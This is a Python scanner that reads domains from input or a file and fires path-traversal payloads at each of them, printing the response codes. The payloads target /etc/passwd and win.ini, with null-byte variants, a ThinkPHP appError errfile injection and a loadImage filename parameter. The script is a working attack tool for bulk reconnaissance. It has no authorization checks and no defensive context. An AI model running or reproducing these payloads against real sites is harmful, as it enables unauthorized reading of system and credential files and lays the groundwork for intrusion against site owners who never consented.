import requests
import os
chk = input("Manual(m) or File(f): ")
if chk == 'm':
    while True:
        domain = input("Enter domain: ")
        x = requests.get('https://'+domain+'/?s=index/think\\\Error/appError&errno=1&errstr=1&errline=1&errfile=../../../etc/passwd')
        print('['+str(x.status_code)+']','-->','https://'+domain+'/?s=index/think\\\Error/appError&errno=1&errstr=1&errline=1&errfile=../../../etc/passwd')
        x = requests.get('https://'+domain+'/loadImage?filename=../../../etc/passwd')
        print('['+str(x.status_code)+']','-->','https://'+domain+'/loadImage?filename=../../../etc/passwd')
        x = requests.get('https://'+domain+'?filename=../../../etc/passwd')
        print('['+str(x.status_code)+']','-->','https://'+domain+'?filename=../../../etc/passwd')
        x = requests.get('https://'+domain+'/var/www/images/../../../etc/passwd')
        print('['+str(x.status_code)+']','-->','https://'+domain+'/var/www/images/../../../etc/passwd')
        x = requests.get('https://'+domain+'?filename=../../../etc/passwd%00.png')
        print('['+str(x.status_code)+']','-->','https://'+domain+'?filename=../../../etc/passwd%00.png')
        x = requests.get('https://'+domain+'/loadImage?filename=../../../etc/passwd%00.png')
        print('['+str(x.status_code)+']','-->','https://'+domain+'/loadImage?filename=../../../etc/passwd%00.png')
        x = requests.get('https://'+domain+'/filename=/var/www/images/../../../etc/passwd')
        print('['+str(x.status_code)+']','-->','https://'+domain+'/filename=/var/www/images/../../../etc/passwd')
        x = requests.get('https://'+domain+'?filename=/var/www/images/../../../etc/passwd')
        print('['+str(x.status_code)+']','-->','https://'+domain+'?filename=/var/www/images/../../../etc/passwd')
        x = requests.get('https://'+domain+'?filename=..\..\..\windows\win.ini')
        print('['+str(x.status_code)+']','-->','https://'+domain+'?filename=..\..\..\windows\win.ini')
        x = requests.get('https://'+domain+'/loadImage?filename=..\..\..\windows\win.ini')
        print('['+str(x.status_code)+']','-->','https://'+domain+'/loadImage?filename=..\..\..\windows\win.ini')
        print("--------------------------------------------------------------------------------------------------------------------------------------------------------")
elif chk == 'f':
    pth = input("Enter domains.txt file path: ")
    dmF = open(pth,'r')
    dmf = str(dmF.read()).split("\n")
    ldm = list(dmf)
    for i in range(0,len(ldm)-1):
        domain = ldm[i]
        x = requests.get('https://'+domain+'/?s=index/think\\\Error/appError&errno=1&errstr=1&errline=1&errfile=../../../etc/passwd')
        print('['+str(x.status_code)+']','-->','https://'+domain+'/?s=index/think\\\Error/appError&errno=1&errstr=1&errline=1&errfile=../../../etc/passwd')
        x = requests.get('https://'+domain+'/loadImage?filename=../../../etc/passwd')
        print('['+str(x.status_code)+']','-->','https://'+domain+'/loadImage?filename=../../../etc/passwd')
        x = requests.get('https://'+domain+'?filename=../../../etc/passwd')
        print('['+str(x.status_code)+']','-->','https://'+domain+'?filename=../../../etc/passwd')
        x = requests.get('https://'+domain+'/var/www/images/../../../etc/passwd')
        print('['+str(x.status_code)+']','-->','https://'+domain+'/var/www/images/../../../etc/passwd')
        x = requests.get('https://'+domain+'?filename=../../../etc/passwd%00.png')
        print('['+str(x.status_code)+']','-->','https://'+domain+'?filename=../../../etc/passwd%00.png')
        x = requests.get('https://'+domain+'/loadImage?filename=../../../etc/passwd%00.png')
        print('['+str(x.status_code)+']','-->','https://'+domain+'/loadImage?filename=../../../etc/passwd%00.png')
        x = requests.get('https://'+domain+'/filename=/var/www/images/../../../etc/passwd')
        print('['+str(x.status_code)+']','-->','https://'+domain+'/filename=/var/www/images/../../../etc/passwd')
        x = requests.get('https://'+domain+'?filename=/var/www/images/../../../etc/passwd')
        print('['+str(x.status_code)+']','-->','https://'+domain+'?filename=/var/www/images/../../../etc/passwd')
        x = requests.get('https://'+domain+'?filename=..\..\..\windows\win.ini')
        print('['+str(x.status_code)+']','-->','https://'+domain+'?filename=..\..\..\windows\win.ini')
        x = requests.get('https://'+domain+'/loadImage?filename=..\..\..\windows\win.ini')
        print('['+str(x.status_code)+']','-->','https://'+domain+'/loadImage?filename=..\..\..\windows\win.ini')
        print("--------------------------------------------------------------------------------------------------------------------------------------------------------")
else:
    print('!!!!!!!!!!!!!!!!!!!!!!!! Wrong Key !!!!!!!!!!!!!!!!!!!!!!!!!')